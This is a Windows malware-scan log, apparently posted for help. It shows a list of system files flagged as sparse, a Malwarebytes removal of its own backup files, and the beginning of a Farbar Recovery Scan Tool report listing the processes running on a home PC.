File "C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\MSCORSECIMPL.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\wbem\wmiutils.dll" is sparse (flags = 32768)
File "C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\WMINET_UTILS.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\rtutils.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\msctfui.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\DLNASHEXT.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\DLNASHEXT.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\DEVDISPITEMPROVIDER.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\wpdshext.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\msiltcfg.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\opengl32.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\glu32.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\ddraw.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\dciman32.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\dciman32.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\winusb.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\hhctrl.ocx" is sparse (flags = 32768)
File "C:\WINDOWS\System32\srclient.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\spp.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\vssapi.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\vsstrace.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\msxml6.dll" is sparse (flags = 32768)
File "C:\WINDOWS\AppPatch\AcLayers.dll" is sparse (flags = 32768)
File "C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\DIASYMREADER.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\msv1_0.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\msv1_0.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\NTLMSHARED.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\cryptdll.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\INSTALLAGENT.EXE" is sparse (flags = 32768)
File "C:\WINDOWS\System32\INSTALLAGENT.EXE" is sparse (flags = 32768)
File "C:\WINDOWS\System32\APPLICATIONFRAMEHOST.EXE" is sparse (flags = 32768)
File "C:\WINDOWS\System32\APPLICATIONFRAMEHOST.EXE" is sparse (flags = 32768)
File "C:\WINDOWS\System32\SEARCHPROTOCOLHOST.EXE" is sparse (flags = 32768)
File "C:\WINDOWS\System32\SEARCHPROTOCOLHOST.EXE" is sparse (flags = 32768)
File "C:\WINDOWS\System32\audiodg.exe" is sparse (flags = 32768)
File "C:\WINDOWS\System32\audiodg.exe" is sparse (flags = 32768)
File "C:\WINDOWS\System32\SEARCHFILTERHOST.EXE" is sparse (flags = 32768)
File "C:\WINDOWS\System32\SEARCHFILTERHOST.EXE" is sparse (flags = 32768)
File "C:\WINDOWS\SysWOW64\ONEDRIVESETUP.EXE" is sparse (flags = 32768)
File "C:\WINDOWS\System32\credssp.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\userinit.exe" is sparse (flags = 32768)
File "C:\WINDOWS\System32\scecli.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\kerberos.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\wdigest.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\TSpkg.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\pku2u.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\1394ohci.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\flpydisk.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\mspclock.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\acpiex.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\acpi.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\isapnp.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\acpipmi.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\Locator.exe" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\amdk8.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\acpipagr.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\acpitime.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\luafv.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\mpsdrv.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\afd.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\asyncmac.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\srv.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\AGP440.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\sdstor.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\ahcache.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\alg.exe" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\BASICRENDER.SYS" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\BASICRENDER.SYS" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\amdppm.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\umpass.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\appid.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\rspndr.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\irenum.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\ioqos.sys" is sparse (flags = 32768)
File "C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\ASPNET_STATE.EXE" is sparse (flags = 32768)
File "C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\ASPNET_STATE.EXE" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\srv2.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\atapi.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\BASICDISPLAY.SYS" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\BASICDISPLAY.SYS" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\pciide.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\bowser.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\BTHAVRCPTG.SYS" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\BTHAVRCPTG.SYS" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\BTHHFENUM.SYS" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\BthhfHid.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\bthmodem.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\volmgr.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\udfs.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\uefi.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\cdfs.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\clfs.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\cdrom.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\circlass.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\mup.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\CmBatt.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\cng.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\CNGHWASSIST.SYS" is sparse (flags = 32768)
File "C:\WINDOWS\System32\dllhost.exe" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\condrv.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\dam.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\dfsc.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\disk.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\DiagSvcs\DIAGNOSTICSHUB.STANDARDCOLLECTOR.SERVICE.EXE" is sparse (flags = 32768)
File "C:\WINDOWS\System32\DiagSvcs\DIAGNOSTICSHUB.STANDARDCOLLECTOR.SERVICE.EXE" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\dmvsc.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\drmkaud.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\drmkaud.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\serial.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\dxgkrnl.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\tcpip.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\EHSTORCLASS.SYS" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\EHSTORTCGDRV.SYS" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\EHSTORTCGDRV.SYS" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\errdev.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\fileinfo.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\FXSSVC.exe" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\SerCx.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\SpbCx.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\fcvsc.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\fdc.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\FILECRYPT.SYS" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\vmstorfl.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\ipfltdrv.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\FILETRACE.SYS" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\fltMgr.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\monitor.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\FSDEPENDS.SYS" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\STORQOSFLT.SYS" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\fvevol.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\GAGP30KX.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\ndisuio.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\MSGPIOCLX.SYS" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\GPUENERGYDRV.SYS" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\GPUENERGYDRV.SYS" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\rasl2tp.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\mrxsmb.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\hdaudbus.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\hdaudbus.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\hidbatt.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\hidbth.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\hidi2c.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\HIDINTERRUPT.SYS" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\HIDINTERRUPT.SYS" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\hidir.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\hidusb.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\http.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\hwpolicy.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\hyperkbd.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\Ndu.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\HYPERVIDEO.SYS" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\HYPERVIDEO.SYS" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\ndproxy.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\i8042prt.sys" is sparse (flags = 32768)
File "C:\WINDOWS\SysWOW64\perfhost.exe" is sparse (flags = 32768)
File "C:\WINDOWS\System32\IEETWCOLLECTOR.EXE" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\intelide.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\intelpep.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\intelppm.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\IPMIDrv.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\ipnat.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\msiscsi.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\kbdclass.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\kbdhid.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\ksecdd.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\ksecpkg.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\ksecpkg.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\ksthunk.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\vpci.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\lltdio.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\mqac.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\mmcss.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\mskssrv.sys" is sparse (flags = 32768)
File "C:\Program Files\Windows Defender\MsMpEng.exe" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\wimmount.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\wimmount.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\mrxdav.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\modem.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\mspqm.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\mouclass.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\mouhid.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\mountmgr.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\mrxsmb10.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\mrxsmb20.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\Ucx01000.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\ufx01000.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\bridge.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\VSSVC.exe" is sparse (flags = 32768)
File "C:\WINDOWS\System32\msdtc.exe" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\MSHIDKMDF.SYS" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\MSHIDUMDF.SYS" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\msisadrv.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\mstee.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\msiexec.exe" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\mslldp.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\mssmbios.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\MTConfig.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\nwifi.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\nwifi.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\netbios.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\ndis.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\ndiscap.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\NDISIMPLATFORM.SYS" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\tunnel.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\ndistapi.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\usbhub.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\NDISVIRTUALBUS.SYS" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\ndiswan.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\netbt.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\NPSVCTRIG.SYS" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\NPSVCTRIG.SYS" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\nsiproxy.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\NV_AGP.SYS" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\usbehci.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\usbehci.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\usbohci.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\usbohci.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\usbuhci.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\usbuhci.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\USBXHCI.SYS" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\parport.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\vds.exe" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\partmgr.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\pci.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\pcw.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\pdc.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\pcmcia.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\PEAuth.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\qwavedrv.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\raspptp.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\processr.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\pacer.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\rasacd.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\agilevpn.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\raspppoe.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\rassstp.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\rdbss.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\rdpbus.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\rdpdr.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\RDPVIDEOMINIPORT.SYS" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\RDPVIDEOMINIPORT.SYS" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\rdyboost.sys" is sparse (flags = 32768)
File "C:\WINDOWS\servicing\TRUSTEDINSTALLER.EXE" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\vms3cap.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\sbp2port.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\WdFilter.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\scfilter.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\SENSORDATASERVICE.EXE" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\serenum.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\SerCx2.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\sermouse.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\URSCX01000.SYS" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\sfloppy.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\snmptrap.exe" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\SPACEPORT.SYS" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\SPACEPORT.SYS" is sparse (flags = 32768)
File "C:\WINDOWS\System32\sppsvc.exe" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\srvnet.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\volmgrx.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\storahci.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\stornvme.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\storufs.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\storvsc.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\tcpipreg.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\tdx.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\tpm.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\terminpt.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\vdrvroot.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\TsUsbFlt.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\TsUsbGD.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\UAGP35.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\uaspstor.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\UcmCx.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\Udecx.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\usbccgp.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\UI0DETECT.EXE" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\ULIAGPKX.SYS" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\umbus.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\USBAUDIO.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\usbcir.sys" is sparse (flags = 32768)
Scan finished
=======================================


Removal queue found; removal started
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-0-i.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\VBR-0-0-206848-i.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-0-r.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-1-i.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\VBR-1-0-206848-i.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-1-r.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-2-i.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\VBR-2-0-2048-i.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-2-r.mbam...
Removal finished

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:27-02-2016
Ran by Kym (administrator) on KYM-PC (01-03-2016 22:11:51)
Running from C:\Users\Kym\Desktop
Loaded Profiles: Kym (Available Profiles: Kym)
Platform: Windows 10 Home (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AMD) C:\WINDOWS\System32\atiesrxx.exe
(Intel Corporation) C:\WINDOWS\System32\igfxCUIService.exe
(AMD) C:\WINDOWS\System32\atieclxx.exe
(Avast Software s.r.o.) C:\Program Files\AVAST Software\Avast\AvastSvc.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
(Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
(Microsoft Corporation) C:\WINDOWS\System32\mqsvc.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe
(Razer Inc.) C:\Program Files (x86)\Razer Chroma SDK\bin\RzSDKService.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe
(Nuance Communications, Inc.) C:\Program Files (x86)\Nuance\PaperPort\PDFProFiltSrvPP.exe
() C:\Program Files (x86)\Razer\Razer Services\GSS\GameScannerService.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe
(Microsoft Corporation) C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(Microsoft Corporation) C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(Avast Software) C:\Program Files\AVAST Software\Avast\ng\vbox\AvastVBoxSVC.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\ng\ngservice.exe
(Microsoft Corporation) C:\WINDOWS\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Intel Corporation) C:\WINDOWS\System32\igfxEM.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Logitech Inc.) C:\Program Files\Logitech Gaming Software\LCore.exe
(Logitech Inc.) C:\Program Files\Logitech Gaming Software\Applets\LCDMedia.exe
(Logitech Inc.) C:\Program Files\Logitech Gaming Software\Applets\LCDCountdown.exe
(Logitech Inc.) C:\Program Files\Logitech Gaming Software\Applets\LCDClock.exe
(Logitech Inc.) C:\Program Files\Logitech Gaming Software\Applets\LCDPOP3.exe
(Logitech Inc.) C:\Program Files\Logitech Gaming Software\Applets\LCDRSS.exe
(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(Advanced Micro Devices, Inc.) C:\Program Files\AMD\CNext\CNext\cnext.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Angus Johnson) D:\Internode\mum.exe
(Spotify Ltd) C:\Users\Kym\AppData\Roaming\Spotify\SpotifyWebHelper.exe
(Acresso Corporation) C:\ProgramData\FLEXnet\Connect\11\ISUSPM.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
(Avast Software s.r.o.) C:\Program Files\AVAST Software\Avast\AvastUI.exe
(Razer Inc.) C:\Program Files (x86)\Razer\Synapse\RzSynapse.exe
(Nuance Communications, Inc.) C:\Program Files (x86)\Nuance\PaperPort\pptd40nt.exe
(Nuance Communications, Inc.) C:\Program Files (x86)\Nuance\PDF Viewer Plus\pdfPro5Hook.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\ControlCenter4\BrCtrlCntr.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\Browny02\Brother\BrStMonW.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\ControlCenter4\BrCcUxSys.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\Browny02\BrYNSvc.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe
() C:\ProgramData\Razer\Synapse\RzStats\RzStats.Manager.exe
(Razer, Inc.) C:\Program Files (x86)\Razer\InGameEngine\32bit\RazerIngameEngine.exe
(Razer, Inc.) C:\Users\Kym\AppData\Local\Razer\InGameEngine\cache\RzStats.Manager\rzcefrenderprocess.exe
(Razer, Inc.) C:\Users\Kym\AppData\Local\Razer\InGameEngine\cache\RzSynapse\rzcefrenderprocess.exe
(Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe
(Adobe Systems Incorporated) D:\Program Files\Adobe\Adobe Premiere Elements 2011\Elements 11 Organizer\PhotoshopElementsFileAgent.exe
(Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
(Microsoft Corporation) C:\WINDOWS\System32\InstallAgent.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
